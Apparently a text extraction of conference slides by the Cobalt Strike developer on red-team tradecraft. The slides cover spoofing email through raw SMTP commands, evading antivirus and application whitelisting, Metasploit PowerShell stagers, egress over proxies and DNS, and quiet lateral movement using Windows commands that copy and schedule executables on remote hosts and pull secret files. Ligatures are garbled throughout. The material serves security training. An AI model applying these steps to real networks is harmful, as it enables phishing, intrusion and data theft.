Offense in Depth

TOOLS AND TRADECRAFT •  Raphael Mudge –  Principal, Strategic Cyber LLC –  Developer, Cobalt Strike –  Resident, Washington DC • 
How to get a Foothold Message Delivery Code ExecuCon Egress Stay Quiet 1. 
Map client-­‐side aHack surface Create Virtual Machine for tesCng purposes Use Virtual Machine to select best aHack Configure and disguise the aHack Email aHack package to vicCm •  Defense (DKIM, SPF, and DMARC) idenCfy spoofed messages •  AHacker send email from aHacker controlled domain OR spoof a domain with no validaCon informaCon # telnet mail server 25 HELO MAIL FROM: <[email protected]> RCPT TO: <target email here> DATA message data . QUIT # telnet mail server 25 HELO MAIL FROM: <[email protected]> RCPT TO: <target email here> DATA message data . QUIT # telnet mail server 25 HELO MAIL FROM: <[email protected]> RCPT TO: <target email here> DATA message data . QUIT •  Sender Policy Framework (SPF) –  dig +short TXT •  DomainKeys IdenCfied Mail (DKIM) •  Domain-­‐based Message AuthenCcaCon, ReporCng and Conformance (DMARC) –  dig +short TXT •  Accepted Domains (MS Exchange Feature) •  Defense (AnC-­‐virus) check for known bad and stop it •  AHacker get code into memory without known bad •  False posiCves are bad •  Non-­‐intrusive(?) •  Only checks file at certain points –  When loaded in browser –  When wriHen to disk •  Check for known signature •  Apply heurisCc to detect bad behavior •  Emulate binary to defeat packers and crypters 1.  Find out or guess which anC-­‐virus is in use 2.  Put anC-­‐virus on test Virtual Machine 3.  Select undetected aHack or modify exisCng aHack STAGERS and Exploits •  Use AV-­‐safe stager EXE –  Easy to write in a pinch –  Tools exist to generate AV-­‐safe stagers (e.g. Veil) •  Avoid an EXE if possible –  exploit/windows/smb/psexec_psh –  exploit/windows/misc/psh_web_delivery 1. 
Connect to aHacker Read integer containing stage-­‐2 length Read [stage length] bytes Allocate RWX buffer Move connecCon to EDI register Copy stage data to RWX buffer Pass control to stage See: hHps://­‐loader •  Use AV-­‐Safe Client-­‐side Exploit –  Custom Java Applet AHack –  MS Office Macro •  Modify Metasploit Client-­‐side Exploit –  Change strings in module •  Defense (ApplicaCon WhitelisCng) do not allow unapproved applicaCons •  AHacker get agent into memory using a white-­‐listed applicaCon. •  Use aHacks that inject directly into memory –  Custom Java Applet AHack –  MS Office Macro •  Get into memory with PowerShell –  exploit/windows/smb/psexec_psh –  exploit/windows/misc/psh_web_delivery •  Defense (Firewall) limit which protocols may leave network •  AHacker communicate over allowed protocol •  Deny all outbound traffic •  Allow egress only through a proxy device –  AHack traffic must conform to expected protocol –  Must pass other checks as well… •  AHacker LimitaCon: Staging! •  Stagers are sized constrained –  smaller is beHer •  If payload can’t stage… it can’t execute •  If protocol works for staging; C2 is OK •  Set EnableStageEncoding to avoid this… •  Metasploit Framework HTTP/HTTPS Stagers –  Transparent Proxy? OK –  AutomaCc NTLM Auth to Proxy? OK –  StaCc Username and Password on Proxy? Not OK •  Other ways out? DNS –  ~184 bytes per DNS TXT record request –  ~550 DNS TXT requests to move 100KB of data •  Defense (Network Security Monitoring) alert on observed aHacker acCons on network •  AHacker – Limit noisy acCvity – Use low & slow C2 strategy •  Do not scan hosts… –  (ab)use acCve directory to discover hosts •  Use Windows commands to accomplish goals –  upload / schedule an executable via a command shell is safer than launching an exploit •  Use normal clients to interact with systems –  Browser Pivot to interact with internal websites –  RDP, SSH, etc. How do I… Do this… Find out which domain I trust net view /DOMAIN See some hosts in the domain net view /DOMAIN:[domain] See which hosts are DCs for a domain nltest /dclist:[domain] Map a NetBIOS name to an IPv4 address ping –n 1 -­‐4 [name] •  Where are you an administrator? windows/gather/local_admin_search_enum •  Copy a file to a host
copy file.exe \\host\C$ •  What Cme is it on the target host? (cmd.exe) net time \\host
•  Schedule a task to run (cmd.exe) at \\host hh:mm c:\file.exe
Note: at is deprecated. Use schtasks or wmic •  Use UNC path to reference files on other host •  List files in c:\foo on remote host dir \\host\C$\foo
•  Copy remote c:\foo\secrets.txt to current host copy \\host\C$\foo\secrets.txt .
•  Go shopping for files on remote host dir /S \\host\C$ >files.txt
•  Use a slow asynchronous payload! –  sleep Cme of minutes to hours (with jiHer) –  Call home to mulCple domains •  When you go interacCve… –  Spawn interacCve sessions to another server (don’t burn your primary C2 server) –  Go interacCve only when necessary (or at night) • 
Get a Foothold Message Delivery Code ExecuCon Egress Stay Quiet TradecraC Course hHp:// My Contact InformaGon Correspondence in 140 chars @armitagehacker